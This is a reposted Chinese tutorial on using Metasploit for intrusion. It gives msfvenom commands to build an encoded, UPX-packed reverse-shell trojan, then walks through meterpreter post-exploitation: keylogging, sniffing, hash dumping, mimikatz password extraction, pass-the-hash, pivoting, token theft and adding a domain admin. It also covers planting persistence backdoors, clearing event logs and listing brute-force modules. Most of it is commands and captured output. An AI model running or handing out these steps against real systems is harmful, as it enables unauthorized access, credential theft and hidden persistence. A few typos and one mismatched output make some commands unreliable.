滲透工具之msf

轉載自

csdn：憶蓉之心

簡介

它是一個免費的、可下載的框架，通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。

環境

工具：msf4

僞裝木馬

原理：msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令行,和效率.利用msfvenom生成木馬程序,並在目標機上執行,在本地監聽上線。

構造shellcode常用命令

msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f c

msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0b\x27\x36\xce\xc1\x42\xa9\x0d" -f python

常用命令

查看幫助

msfvenom -h

查看一個Payload具體需要什麼參數?

msfvenom -p windows/meterpreter/bind_tcp --payload-options

自己本地生成的bind_tcp的payload並不能在Windows機子上運行 (提示不是可用的Win32程序；如果大家也有遇到這種錯誤的話，推薦用msfvenom生成c的shellcode 然後自己編譯爲exe後運行。使用msfvenom –list可以查看所有的payload encoder nops。

設置LHOST,即監聽主機IP和LPORT監聽端口,我是本地局域網測試,所以IP是192.168.1.152,端口設置成443.所以最後連接會通向192.168.1.152的443端口。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.152 LPORT=443 -f exe > c.exe

參數說明：

-p payload
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
LHOST,LPORT 監聽上線的主機IP和端口
-f exe 生成EXE格式

upx加殼

說明：upx只是壓縮殼工具；如果需要增大破解難度，需要添加加密殼。

upx -9 c.exe

本機監聽

因爲之前用的是reverse_tcp,所以設置如下：

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

驗證

基本命令

background  # 讓meterpreter處於後臺模式  
sessions -i number   # 與會話進行交互，number表示第n個session  
quit  # 退出會話  
shell # 獲得命令行
cat c:\\boot.ini   # 查看文件內容  
getwd # 查看當前工作目錄 work directory  
upload /root/Desktop/netcat.exe c:\\ # 上傳文件到目標機上  
download 0xfa.txt /root/Desktop/   # 下載文件到本機上  
edit c:\\boot.ini  # 編輯文件  
search -d d:\\www -f web.config # search 文件 
ps # 查看當前活躍進程  
migrate  pid # 將Meterpreter會話移植到進程數位pid的進程中  
execute -H -i -f cmd.exe # 創建新進程cmd.exe，-H不可見，-i交互  
getpid # 獲取當前進程的pid  
kill pid # 殺死進程  
getuid # 查看權限  
sysinfo # 查看目標機系統信息，如機器名，操作系統等  
getsystem #提權操作
timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的創建時間

遷移進程

meterpreter > ps
自行選擇PID
meterpreter > migrate pid

提權操作

getsystem 大部分都會失敗 他只嘗試了4個Payload。
meterpreter > getuid    
Server username: Testing\Croxy    
meterpreter > getsystem    
[-] priv_elevate_getsystem: Operation failed: Access is denied.
使用MS14-058之類的Exp進行提權
meterpreter > background
[*] Backgrounding session 3..
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 3

獲取敏感信息

run post/windows/gather/checkvm #是否虛擬機
run post/windows/gather/enum_applications #獲取安裝軟件信息
run post/windows/gather/dumplinks   #獲取最近的文件操作
run post/windows/gather/enum_ie  #獲取IE緩存
run post/windows/gather/enum_chrome   #獲取Chrome緩存
run scraper                      #獲取常見信息
#保存在～/.msf4/logs/scripts/scraper/目錄下

鍵盤記錄

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
dir <Return> cd  <Ctrl>  <LCtrl>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

網絡嗅探

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
    1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
    2 - 'Intel(R) PRO/1000 MT Desktop Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
    3 - 'Cisco Systems VPN Adapter' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 /tmp/test2.cap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 1176 packets (443692 bytes)
[*] Downloaded 100% (443692/443692)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/test2.cap

獲取hash

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TESTING
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hints...
[+]     Croxy:"Whoareyou"
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
[+]     HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
[+]     test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::

獲取明文密碼

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM    

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials    

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================    

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : Testing
BootKey    : 8c2c8d96e92a8ccfc407a1ca48531239    

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Croxy ; Testing ; hehe }
[1] { test ; Testing ; test }

通過hash獲取權限

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options    

Module options (exploit/windows/smb/psexec):    

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST                       yes       The target address
RPORT      445              yes       Set the SMB service port
SHARE      ADMIN$           yes       The share to connect to, can be an admi                                              n share

(ADMIN$,C$,...) or a normal read/write folder share
SMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                                ation
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as    

Exploit target:    

Id  Name
--  ----
0   Automatic    

msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537    

SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877)

內網滲透

端口轉發 (將遠程主機3389端口轉發到本地1234端口上)

meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54
[*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80

內網代理

meterpreter > run autoroute -s 10.42.0`.54
[*] Adding a route to 10.42.0.54/255.255.255.0...
[+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options    

Module options (auxiliary/server/socks4a):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The address to listen on
SRVPORT  1080             yes       The port to listen on.    

Auxiliary action:
Name   Description
----   -----------
Proxy      

msf auxiliary(socks4a) > route print
Active Routing Table
====================
Subnet             Netmask            Gateway
------             -------            -------
10.42.0.54         255.255.255.0      Session 1    

msf auxiliary(socks4a) > ifconfig
[*] exec: ifconfig    

msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx
SRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx爲自己運行msf的vps機子)    

msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server

之後使用proxychains 設置socks4代理 鏈接vps上的1080端口 就可以訪問內網了。

SSH代理

msf > load meta_ssh
msf > use multi/ssh/login_password
msf > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf > set USER test
USER => test
msf > set PASS reverse
PASS => reverse
msf > set PAYLOAD ssh/metassh_session
PAYLOAD => ssh/metassh_session
msf > exploit -z
[*] Connecting to dsl@192.168.56.3:22 with password reverse
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28   03:51:16 +1300
[*] Session 1 created in the background.
msf > route add 192.168.57.0 255.255.255.0 1

之後就是愉快的內網掃描了。 
當然還是推薦直接用ssh -f -N -D 127.0.0.1:6666 [email protected]

偷取token

meterpreter>ps #查看目標機器進程，找出域控賬戶運行的進程ID
meterpreter>steal_token pid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load incognito
Loading extension incognito...success.
meterpreter > list_tokens -u    

Delegation Tokens Available
========================================
IIS APPPOOL\zyk
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
QLWEB\Administrator    

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON    

meterpreter > impersonate_token QLWEB\\Administrator
[+] Delegation token available
[+] Successfully impersonated user QLWEB\Administrator
meterpreter > getuid
Server username: QLWEB\Administrator
meterpreter>add_user 0xfa funny –h192.168.3.98  #在域控主機上添加賬戶
meterpreter>add_group_user “DomainAdmins” 0xfa –h192.168.3.98   #將賬戶添加至域管理員組

內網掃描

meterpreter > run autoroute -s 192.168.3.98
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
PORTS => 80,8080,21,22,3389,445,1433,3306
msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24
RHOSTS => 192.168.3.1/24
msf auxiliary(tcp) > set THERADS 10
THERADS => 10
msf auxiliary(tcp) > exploit

後門

一個vbs後門，寫入了開機啓動項；但是容易被發現，還是需要大家發揮自己的智慧。

meterpreter > run persistence -X -i 5 -p 23333 -r 10.42.0.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/croxy/.msf4/logs/persistence/TESTING_20150930.3914/TESTING_20150930.3914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333
[*] Persistent agent script is 148453 bytes long
[+] Persistent Script written to C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs
[*] Executing script C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs
[+] Agent executed with PID 4140
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr
Meterpreter服務後門
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\Croxy\AppData\Local\Temp\tuIKWqmuO...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
* Service metsvc successfully installed.

之後電腦就默默生成了一個自啓服務meterpreter；然後連接後門。

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set RHOST 10.42.0.54
RHOST => 10.42.0.54
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

清理痕跡

meterpreter > clearev
[*] Wiping 12348 records from Application...
[*] Wiping 1345 records from System...
[*] Wiping 3 records from Security...

meterpreter > timestomp

一些常用的破解模塊

auxiliary/scanner/mssql/mssql_login 
auxiliary/scanner/ftp/ftp_login 
auxiliary/scanner/ssh/ssh_login 
auxiliary/scanner/telnet/telnet_login 
auxiliary/scanner/smb/smb_login 
auxiliary/scanner/mssql/mssql_login 
auxiliary/scanner/mysql/mysql_login 
auxiliary/scanner/oracle/oracle_login 
auxiliary/scanner/postgres/postgres_login 
auxiliary/scanner/vnc/vnc_login 
auxiliary/scanner/pcanywhere/pcanywhere_login 
auxiliary/scanner/snmp/snmp_login 
auxiliary/scanner/ftp/anonymous

一些好用的模塊

auxiliary/admin/realvnc_41_bypass (Bypass VNCV4網上也有利用工具) 
auxiliary/admin/cisco/cisco_secure_acs_bypass （cisco Bypass 版本5.1或者未打補丁5.2版 洞略老） 
auxiliary/admin/http/jboss_deploymentfilerepository （內網遇到Jboss最愛:)） 
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令執行:) 
auxiliary/admin/mssql/mssql_exec （用爆破得到的sa弱口令進行執行命令 沒回顯:(） 
auxiliary/scanner/http/jboss_vulnscan (Jboss 內網滲透的好朋友) 
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令執行sql語句:) 
auxiliary/admin/oracle/post_exploitation/win32exec （爆破得到Oracle弱口令來Win32命令執行） 
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用戶來執行sql語句)

一些好用的腳本

uxiliary/scanner/rsync/modules_list （Rsync） 
auxiliary/scanner/misc/redis_server (Redis) 
auxiliary/scanner/ssl/openssl_heartbleed (心臟滴血) 
auxiliary/scanner/mongodb/mongodb_login (Mongodb) 
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch) 
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含) 
auxiliary/scanner/http/http_put (http Put) 
auxiliary/scanner/http/gitlab_user_enum (獲取內網gitlab用戶) 
auxiliary/scanner/http/jenkins_enum (獲取內網jenkins用戶) 
auxiliary/scanner/http/svn_scanner （svn Hunter） 
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破) 
auxiliary/scanner/http/zabbix_login （Zabbix )